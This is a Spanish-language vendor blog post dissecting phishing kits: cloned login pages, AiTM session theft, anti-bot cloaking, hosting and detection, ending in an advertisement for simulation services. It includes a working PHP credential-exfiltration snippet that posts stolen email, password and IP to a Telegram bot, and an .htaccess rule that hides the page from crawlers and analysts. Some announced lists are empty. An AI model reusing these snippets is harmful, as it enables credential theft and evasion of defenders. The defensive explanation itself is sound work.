← Todos los artículos

Anatomía de un kit de phishing moderno

GottaPhish Team · April 22, 2026

Un «kit de phishing» es el código empaquetado y reutilizable que los atacantes despliegan para clonar una página de inicio de sesión, cosechar credenciales y exfiltrarlas. Entender cómo se construyen estos kits —y cómo se ocultan— hace mucho más fácil detectar campañas a tiempo y construir simulaciones defensivas convincentes.

Qué contiene un kit

Un kit típico es un archivo ZIP soltado en un servidor comprometido o en un alojamiento barato. Su estructura es notablemente constante:

kit/
├── index.php            # la página de inicio clonada
├── login.php            # gestor del formulario: captura y reenvía credenciales
├── assets/              # copias exactas de CSS, JS, logotipos, tipografías
├── config.php           # destino de exfiltración (correo, bot de Telegram, URL remota)
├── antibots.php         # listas de bloqueo de crawlers, sandboxes, investigadores
└── .htaccess            # reescrituras, filtrado geo/IP, protección hotlink

Los kits modernos se venden cada vez más «como servicio» (PhaaS, Phishing-as-a-Service), con paneles de suscripción, actualizaciones y soporte.

El clon

La página de inicio suele ser una copia byte a byte de una pantalla de acceso real, capturada con un aspirador de sitios o un navegador headless. Dos indicios son habituales:

Los kits avanzados hacen de proxy del sitio real en tiempo real (un montaje de adversario en el medio con herramientas como Evilginx), retransmitiendo lo que teclea la víctima al servidor genuino y robando la cookie de sesión resultante, lo que derrota a la mayoría de la MFA.

Capa antianálisis

El componente antibots es lo que mantiene vivo un kit. Filtra a los visitantes antes de servir la página de phishing:

# fragmento de .htaccess
RewriteCond %{HTTP_USER_AGENT} (googlebot|bingbot|curl|python) [NC]
RewriteRule .* https://real-brand.example/ [R=302,L]

Por eso una URL que a un analista del SOC le «parece muerta» estaba plenamente viva para la víctima minutos antes.

Captura y exfiltración de credenciales

El gestor valida lo justo para parecer real y luego envía los datos. Canales de exfiltración, en orden aproximado de popularidad:

$msg = "u={$_POST['email']}&p={$_POST['pass']}&ip={$_SERVER['REMOTE_ADDR']}";
file_get_contents("https://api.telegram.org/bot$TOKEN/sendMessage?chat_id=$ID&text=".urlencode($msg));
header("Location: https://real-brand.example/error");

Fíjese en la redirección final: tras «fallar el inicio de sesión», la víctima acaba en el sitio real, supone que ha tecleado mal, entra con éxito y no sospecha nada.

Alojamiento y entrega

Los kits prefieren infraestructura desechable: sitios WordPress comprometidos, redirecciones abiertas en dominios de confianza, dominios parecidos recién registrados y, cada vez más, servicios legítimos (Cloudflare Workers, IPFS, SharePoint, Google Docs) para tomar prestada su reputación. La entrega empareja el kit con un señuelo: una factura, una «reverificación» de MFA, un aviso de documento compartido.

Detección defensiva

Señales que merece la pena cazar:

La verdad incómoda: un kit AiTM bien construido derrota a la MFA por SMS y por aplicación robando el token de sesión. Los métodos resistentes al phishing —FIDO2 / passkeys— son la solución duradera.

Cómo ayuda GottaPhish

Los kits de phishing modernos convierten en arma los clones pixel a pixel y el robo de sesión AiTM, que incluso derrotan a la MFA por SMS y por aplicación. GottaPhish y su equipo de expertos le ayudan a enfrentar justamente esa amenaza: simulaciones seguras y plenamente auditadas que reflejan kits reales —enlaces con token, flujos de captura de credenciales, escenarios AiTM— con paneles que muestran qué señuelos calan y dónde aguanta la MFA. Nuestros expertos acompañan la puesta en marcha, diseñan escenarios que reproducen el oficio actual del PhaaS y ayudan a interpretar los resultados como formación específica y como señales concretas de ingeniería de detección para su SOC.